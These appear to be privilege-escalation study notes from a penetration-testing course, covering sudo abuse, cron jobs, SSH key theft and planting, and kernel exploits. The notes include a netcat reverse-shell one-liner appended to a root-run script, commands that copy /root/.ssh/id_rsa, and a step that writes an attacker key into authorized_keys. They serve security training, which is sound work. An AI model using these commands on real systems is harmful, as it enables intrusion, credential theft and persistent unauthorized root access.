Privilege Escalation

Table of Contents

• Clear-text Credentials
  cleartext passwords in files
• User Privileges
  user is given privileges in files or commands
  • sudo
    user given sudo privileges in certain applications/commands
• Scheduled Tasks
  user is given write access to scheduled tasks; write reverse shell in script
• Kernel Exploits
  exploit outdated and unpatched system
• Vulnerable Software
  exploit outdated or vulnerable software on the system

Clear-text Credentials

Linux Credential Hunting and Windows Credential Hunting

User Privileges

privileges available to the user we have access to. Suppose we are allowed to run specific commands as root (or as another user). In that case, we may be able to escalate our privileges to root/system users or gain access as a different user. Below are some common ways to exploit certain user privileges:

1. Sudo
2. SUID
3. Windows Token Privileges

sudo

check what sudo privileges we have with the sudo -l command:

> sudo -l

[sudo] password for user1:
...SNIP...

User user1 may run the following commands on ExampleServer:
    (ALL : ALL) ALL

we can run sudo as that user and not as root. To do so, we can specify the user with -u user:

> sudo -u user /bin/echo Hello World!

    Hello World!

Once we find a particular application we can run with sudo, we can look for ways to exploit it to get a shell as the root user. GTFOBins contains a list of commands and how they can be exploited through sudo. We can search for the application we have sudo privilege over, and if it exists, it may tell us the exact command we should execute to gain root access using the sudo privilege we have.

LOLBAS also contains a list of Windows applications which we may be able to leverage to perform certain functions, like downloading files or executing commands in the context of a privileged user.

For example we have a file called monitor.sh that we as a regular user can execute with root privileges (find this by either sudo -l or LinEnum.sh), we can append to the end of that file malicious script to generate a bash shell for us as root.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh

Scheduled Tasks

In both Linux and Windows, there are methods to have scripts run at specific intervals to carry out a task. Some examples are having an anti-virus scan running every hour or a backup script that runs every 30 minutes. There are usually two ways to take advantage of scheduled tasks (Windows) or cron jobs (Linux) to escalate our privileges:

1. Add new scheduled tasks/cron jobs
2. Trick them to execute a malicious software

The easiest way is to check if we are allowed to add new scheduled tasks. In Linux, a common form of maintaining scheduled tasks is through Cron Jobs. There are specific directories that we may be able to utilize to add new cron jobs if we have the write permissions over them. These include:

1. /etc/crontab
2. /etc/cron.d
3. /var/spool/cron/crontabs/root

If we can write to a directory called by a cron job, we can write a bash script with a reverse shell command, which should send us a reverse shell when executed.

SSH Keys

Finally, let us discuss SSH keys. If we have read access over the .ssh directory for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and use it to log in to the server. If we can read the /root/.ssh/ directory and can read the id_rsa file, we can copy it to our machine and use the -i flag to log in with it:

Privilege Escalation

> vim id_rsa
> chmod 600 id_rsa
> ssh root@10.10.10.10 -i id_rsa

root@10.10.10.10#

If we find ourselves with write access to a users/.ssh/ directory, we can place our public key in the user's ssh directory at /home/user/.ssh/authorized_keys. This technique is usually used to gain ssh access after gaining a shell as that user. The current SSH configuration will not accept keys written by other users, so it will only work if we have already gained control over that user. We must first create a new key with ssh-keygen and the -f flag to specify the output file:

> ssh-keygen -f key

Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): *******
Enter same passphrase again: *******

Your identification has been saved in key
Your public key has been saved in key.pub
The key fingerprint is:
SHA256:...SNIP... user@parrot
The key's randomart image is:
+---[RSA 3072]----+
|   ..o.++.+      |
...SNIP...
|     . ..oo+.    |
+----[SHA256]-----+

This will give us two files: key (which we will use with ssh -i) and key.pub, which we will copy to the remote machine. Let us copy key.pub, then on the remote machine, we will add it into /root/.ssh/authorized_keys:

user@remotehost$ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys

Now, the remote server should allow us to log in as that user by using our private key:

Privilege Escalation

> ssh root@10.10.10.10 -i key

root@remotehost# 

Kernel Exploits

old operating system - looking for potential kernel vulnerabilities that may exist - unpatched versions of Linux and Windows.

Vulnerable Software

dpkg -l command on Linux or look at C:\Program Files in Windows to see what software is installed on the system - look for public exploits for any installed software, especially if any older versions are in use, containing unpatched vulnerabilities.